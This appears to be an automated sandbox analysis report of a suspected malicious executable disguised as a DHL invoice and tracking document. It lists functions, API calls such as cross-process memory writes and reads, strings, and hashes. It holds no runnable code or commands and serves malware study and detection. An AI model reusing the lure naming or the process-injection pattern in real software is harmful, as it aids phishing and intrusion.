API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 9703466cf123d5a51cd0ab2b29f0441d3bc18d1b54d50955f76ed29745551169
Instruction ID: 61e584d2665698962fa80908b2904028b2bf681ce3e7ca9bbea6990d1504b2f9
Opcode Fuzzy Hash: 9703466cf123d5a51cd0ab2b29f0441d3bc18d1b54d50955f76ed29745551169
Instruction Fuzzy Hash: 46018F72A51605FFEB214F68EC09FAA7EAEEB48761F144128FA05D2204D771D940CBA0

Function 012AE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 012AE997
QueryPerformanceFrequency.KERNEL32(?), ref: 012AE9A5
Sleep.KERNEL32(00000000), ref: 012AE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 012AE9B7
Sleep.KERNEL32 ref: 012AE9F3

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c7dfd4a2ab216c2044b63bac46e50b4d6564f83cb6d2ecb45c0803a963b50db5
Instruction ID: 077ace485e40187d5ea8426bcc2873835c607ede5891a9a65c3d5cc951914705
Opcode Fuzzy Hash: c7dfd4a2ab216c2044b63bac46e50b4d6564f83cb6d2ecb45c0803a963b50db5
Instruction Fuzzy Hash: 52016D31C1262ADBCF10AFF9E84DAEDBB78FF09310F41055AD502B2144CB309162C762

Function 012A10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 012A1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,012A0B9B,?,?,?), ref: 012A1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 012A114D

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cd451521aab136b2274763e1838455c8c207ea7411e21f4615ddf0b5e78c4b43
Instruction ID: 00d3d69b025d28f4248c936e704656b26cb1c4d48be919a94a08ed08ed1abe40
Opcode Fuzzy Hash: cd451521aab136b2274763e1838455c8c207ea7411e21f4615ddf0b5e78c4b43
Instruction Fuzzy Hash: 37016D75501215BFDB214F68EC4DA6A3F6EEF85374B210428FA41C3340DA31DC20DB60

Function 012A0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 012A0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 012A0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 012A0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 012A0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 012A1002

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b7a52fb17a6bafe36c94df3383edca506d25b3831a35a4a244dcac8a3f806586
Instruction ID: 2d8d89c8ce59dc53d86eec2c63229b19ea7c60dbd5ff88efa49be7433c874ba6
Opcode Fuzzy Hash: b7a52fb17a6bafe36c94df3383edca506d25b3831a35a4a244dcac8a3f806586
Instruction Fuzzy Hash: 73F04935641312ABDB215FA8EC4DF563BADEF8A762F510428FA45C6281CA70D820CB60

Function 012A1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 012A102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 012A1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 012A1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 012A104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 012A1062

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 6b8532448e32c2bb25d2f7deebf7f4f0f960dffe5a0bf9209ab2671a1dd9e217
Instruction ID: d357bb764133c3bb5afe4f75df85109d090215a1a7b826e70177c46a3e0c109f
Opcode Fuzzy Hash: 6b8532448e32c2bb25d2f7deebf7f4f0f960dffe5a0bf9209ab2671a1dd9e217
Instruction Fuzzy Hash: 51F04935641322ABDB225FA8EC4DF563BADEF8A761F510428FA45C6280CA70D920CB60

Function 012B030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 012B0324
CloseHandle.KERNEL32(?), ref: 012B0331
CloseHandle.KERNEL32(?), ref: 012B033E
CloseHandle.KERNEL32(?), ref: 012B034B
CloseHandle.KERNEL32(?), ref: 012B0358
CloseHandle.KERNEL32(?), ref: 012B0365

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c1753ccb0104f5362aad487f4b96d16a94d649566f82b2483e9b1e4baea8e9dd
Instruction ID: 43db45e0297a086a99d9c2d6079dd382fbca91c630f21df7737a4c5fa164e244
Opcode Fuzzy Hash: c1753ccb0104f5362aad487f4b96d16a94d649566f82b2483e9b1e4baea8e9dd
Instruction Fuzzy Hash: B201D072802B068FD731AF6AD8C0447FBF5BE502453048A3EE29252931C770A954CF80

Function 0127D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0127D752

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 0127D764
_free.LIBCMT ref: 0127D776
_free.LIBCMT ref: 0127D788
_free.LIBCMT ref: 0127D79A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2df529bed0c92b65ac2dd6baac41c5c02db7d32c7a91cb4f82875aa72b413ce1
Instruction ID: 75707e849fbbafc17ddc94eb5a5b45ba8bd915403718daf6f49b76254d150e66
Opcode Fuzzy Hash: 2df529bed0c92b65ac2dd6baac41c5c02db7d32c7a91cb4f82875aa72b413ce1
Instruction Fuzzy Hash: E1F04F3256124AEBD626EABCF5C1C27BFDDBF44360BA82806E248E7505C730F8808764

Function 012722A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 012722BE

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 012722D0
_free.LIBCMT ref: 012722E3
_free.LIBCMT ref: 012722F4
_free.LIBCMT ref: 01272305

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8442611fb80da958a079a66c5cc0ea8adc2e3431378755f3c600acb520163e4c
Instruction ID: 3fa64e8a14e09a75022e1e29f5e39be2631383b683483c2c27c14fefb89a2551
Opcode Fuzzy Hash: 8442611fb80da958a079a66c5cc0ea8adc2e3431378755f3c600acb520163e4c
Instruction Fuzzy Hash: 4CF030B4412112CBC737AF74B80199A7FACB7287A0F192647F510D2298C73405A29BA5

Function 012595C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 012595D4
StrokeAndFillPath.GDI32(?), ref: 012595F0
SelectObject.GDI32(?,00000000), ref: 01259603
DeleteObject.GDI32 ref: 01259616
StrokePath.GDI32(?), ref: 01259631

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 2ff553ad7b26b7e0f8d9c16762964aa788c8923cbf2033b3534f964479d82dbf
Instruction ID: 0e9444fd8f5279e077b0e374346487bdee3c807f840d91962960792c95e923e2
Opcode Fuzzy Hash: 2ff553ad7b26b7e0f8d9c16762964aa788c8923cbf2033b3534f964479d82dbf
Instruction Fuzzy Hash: 36F01931426205EFDF325F79E94C7A43F6AAB01326F048218FA25550E8C73085A9CFA0

Function 01270F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 012710F9
__freea.LIBCMT ref: 01271117

Part of subcall function 01271537: _free.LIBCMT ref: 0127154F

Strings

a/p, xrefs: 012711DE
am/pm, xrefs: 0127117A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 4a6c6ed41b453ea40709251275978e119fee1e7ae47e07e6c5130c333b7830c2
Instruction ID: cc2112a265c49dd6a8df6c74af5f1b1fa7b8bdb9d95d088e61920084a39680fa
Opcode Fuzzy Hash: 4a6c6ed41b453ea40709251275978e119fee1e7ae47e07e6c5130c333b7830c2
Instruction Fuzzy Hash: 2FD1F471A30207CAEB258F6CC8957FBBBB5FF06700F140159EB01AB650D37599A0CB91

Function 012C7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 01260242: EnterCriticalSection.KERNEL32(0131070C,01311884,?,?,0125198B,01312518,?,?,?,012412F9,00000000), ref: 0126024D
Part of subcall function 01260242: LeaveCriticalSection.KERNEL32(0131070C,?,0125198B,01312518,?,?,?,012412F9,00000000), ref: 0126028A

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

Part of subcall function 012600A3: __onexit.LIBCMT ref: 012600A9

__Init_thread_footer.LIBCMT ref: 012C7BFB

Part of subcall function 012601F8: EnterCriticalSection.KERNEL32(0131070C,?,?,01258747,01312514), ref: 01260202
Part of subcall function 012601F8: LeaveCriticalSection.KERNEL32(0131070C,?,01258747,01312514), ref: 01260235

Strings

5, xrefs: 012C7C78
G, xrefs: 012C7C7F
Variable must be of type 'Object'., xrefs: 012C7C3A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 0ffe6c0d32c7d38dacfa8f1191b54929c5c5f64bb7a5d1c4bca495ccf1e7b3fd
Instruction ID: 2e0a36066d86a7d04fd990b5c882fb3a18a80035efd30446f392dae59917fd3a
Opcode Fuzzy Hash: 0ffe6c0d32c7d38dacfa8f1191b54929c5c5f64bb7a5d1c4bca495ccf1e7b3fd
Instruction Fuzzy Hash: FA917C75A2020AEFCB14EF58D8909BDBBB5FF48704F10825DEA069B291DB71AE41CF50

Function 012A2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,012A21D0,?,?,00000034,00000800,?,00000034), ref: 012AB42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 012A2760

Part of subcall function 012AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,012A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 012AB3F8

Part of subcall function 012AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 012AB355
Part of subcall function 012AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,012A2194,00000034,?,?,00001004,00000000,00000000), ref: 012AB365
Part of subcall function 012AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,012A2194,00000034,?,?,00001004,00000000,00000000), ref: 012AB37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 012A27CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 012A281A

Strings

@, xrefs: 012A2832

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: a4bf164bcc1a9bbe0069f51c26619146dc5461d163f6953604fe931af8bf6f6f
Instruction ID: 61f168ee7a3301c53f44346ea68c7d7d5dba384db774e2ecf931c73e50e9cfd1
Opcode Fuzzy Hash: a4bf164bcc1a9bbe0069f51c26619146dc5461d163f6953604fe931af8bf6f6f
Instruction Fuzzy Hash: 16414C72D00219AFDB14DFA4CD45AEEBBB8EF19300F004099FA55B7180DA706F85CBA0

Function 0127172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe,00000104), ref: 01271769
_free.LIBCMT ref: 01271834
_free.LIBCMT ref: 0127183E

Strings

C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, xrefs: 01271760, 01271767, 01271796, 012717CE

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
API String ID: 2506810119-1670384957
Opcode ID: a9171e86f8e52f33432754077d4dcf546c72164e4380f06a3eef0cb1cb9b6266
Instruction ID: a605e5c310b347466f1a17c73f76ad1b78572f4aeed1e8343dedbd55a19de4e6
Opcode Fuzzy Hash: a9171e86f8e52f33432754077d4dcf546c72164e4380f06a3eef0cb1cb9b6266
Instruction Fuzzy Hash: 84316D75A1021AEBEB25DFA9D885DAFBBBCEF95310F144166EA0497200D7B08A51CB90

Function 012AC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 012AC306
DeleteMenu.USER32 ref: 012AC34C
DeleteMenu.USER32 ref: 012AC395

Strings

0, xrefs: 012AC2DF

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: d518f83e62cca9ee4c9cadd8061fd5dc6656d7c84a0955ca56d980f00ee0b89f
Instruction ID: 1efdd94dfab329a237d36131f8456614e0321073a72ce6977d529a5546d78a9e
Opcode Fuzzy Hash: d518f83e62cca9ee4c9cadd8061fd5dc6656d7c84a0955ca56d980f00ee0b89f
Instruction Fuzzy Hash: 7941D531218302DFDB24DF28D884B2ABBE8EF85310F40462DFAA5972D1D770EA54CB52

Function 012D4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 012D44AA
GetWindowLongW.USER32 ref: 012D44C7
SetWindowLongW.USER32 ref: 012D44D7

Strings

SysTreeView32, xrefs: 012D447C

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 00f19cabaa0d683dfbf97eb18fe0eaa4708fdd679c4a3e88cb3af4c8d48afeb8
Instruction ID: bc672508ed65a2bc34893dd1d30a69b28a752a7ef88fc862dd44fdd1056a59bf
Opcode Fuzzy Hash: 00f19cabaa0d683dfbf97eb18fe0eaa4708fdd679c4a3e88cb3af4c8d48afeb8
Instruction Fuzzy Hash: 49318331220646AFDF219E38EC45BEA7BA9EB49334F204719FA75935D0D770E8909B50

Function 012C304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 012C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,012C3077,?,?), ref: 012C3378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 012C307A
_wcslen.LIBCMT ref: 012C309B
htons.WSOCK32(00000000,?,?,00000000), ref: 012C3106

Strings

255.255.255.255, xrefs: 012C3095, 012C309A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 888d4b9bf58bb8a326db007571ffcdf63c90868ce451aac5a60c4c15ebd7aa2e
Instruction ID: 463f81660d130dc902ffbb65169acd740a42b0607c7ad169c53903393f9d386e
Opcode Fuzzy Hash: 888d4b9bf58bb8a326db007571ffcdf63c90868ce451aac5a60c4c15ebd7aa2e
Instruction Fuzzy Hash: E231C0366102429FDB20CF2CC485AAA7BF0BF54718F14CA5DDB158B392DB72D945C761

Function 012D4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 012D4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 012D4713
DestroyWindow.USER32 ref: 012D471A

Strings

msctls_updown32, xrefs: 012D4684

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: ebe137835872affc98303399ddc6e5d8b312836411a5d1748402c6a26dc5d7c1
